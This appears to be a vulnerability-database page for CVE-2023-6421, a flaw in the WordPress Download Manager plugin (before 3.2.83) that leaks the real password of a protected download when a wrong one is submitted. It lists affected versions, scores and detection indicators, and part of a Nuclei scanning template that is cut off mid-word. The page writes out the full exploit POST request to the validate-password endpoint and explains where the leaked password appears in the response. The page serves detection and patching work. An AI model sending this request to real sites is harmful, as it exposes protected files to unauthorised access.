CVE-2023-6421
published 2024-01-01CVE-2023-6421: The Download Manager WordPress plugin before 3.2.83 does not protect file download's passwords, leaking it upon receiving an invalid one.
PriorityP353high7.5CVSS 3.1
AVNACLPRNUINSUCHINAN
EXPLOIT
EPSS
2.44%
82.2th percentile
The Download Manager WordPress plugin before 3.2.83 does not protect file download's passwords, leaking it upon receiving an invalid one.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| w3eden | download_manager | < 3.2.83 | 3.2.83 |
Detection & IOCsextracted from sources · hover to see the quote
commandPOST /index.php?rest_route=/wpdm/validate-password HTTP/1.1
Content-Type: application/x-www-form-urlencoded
__wpdm_ID={{id}}&dataType=json&execute=wpdm_getlink&action=wpdm_ajax_call&password=123322
- →Detect exploitation attempts by monitoring POST requests to the validate-password REST API endpoint with parameters indicative of the attack payload.
- →A successful exploit response will contain both 'Wrong Password' and 'op":"' in the JSON body, leaking the actual password in the '.op' field.
- →The response Content-Type will be application/json and HTTP status 200 even when the wrong password is submitted, indicating password leakage.
- →The leaked password is extracted from the '.op' JSON field in the server response.
- →Identify vulnerable WordPress instances by searching for the download-manager plugin path in page body or URL.
- ·The vulnerability affects WordPress Download Manager plugin versions before 3.2.83 only. ↗
- ·The attack requires knowing or brute-forcing a valid password-protected file ID (the '__wpdm_ID' parameter); the PoC template notes to pass the file ID via the 'id' parameter.
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Nuclei
WordPress Download Manager - File Password Exposure
nuclei·CVSS 7.5
CVE-2023-6421 [HIGH] WordPress Download Manager - File Password Exposure
WordPress Download Manager - File Password Exposure
The WordPress Download Manager plugin contains a vulnerability that allows attackers to obtain passwords for password-protected downloads by sending a specially crafted request to the validate-password API endpoint.
Template:
id: CVE-2023-6421
info:
name: WordPress Download Manager - File Password Exposure
author: ritikchaddha
severity: medium
description: |
The WordPress Download Manager plugin contains a vulnerability that allows attackers to obtain passwords for password-protected downloads by sending a specially crafted request to the validate-password API endpoint.
impact: |
Unauthenticated attackers can obtain passwords for password-protected downloads by sending crafted requests to the validate-password API endpoint.
remediatio
No writeups or analysis indexed.
2024-01-01
Published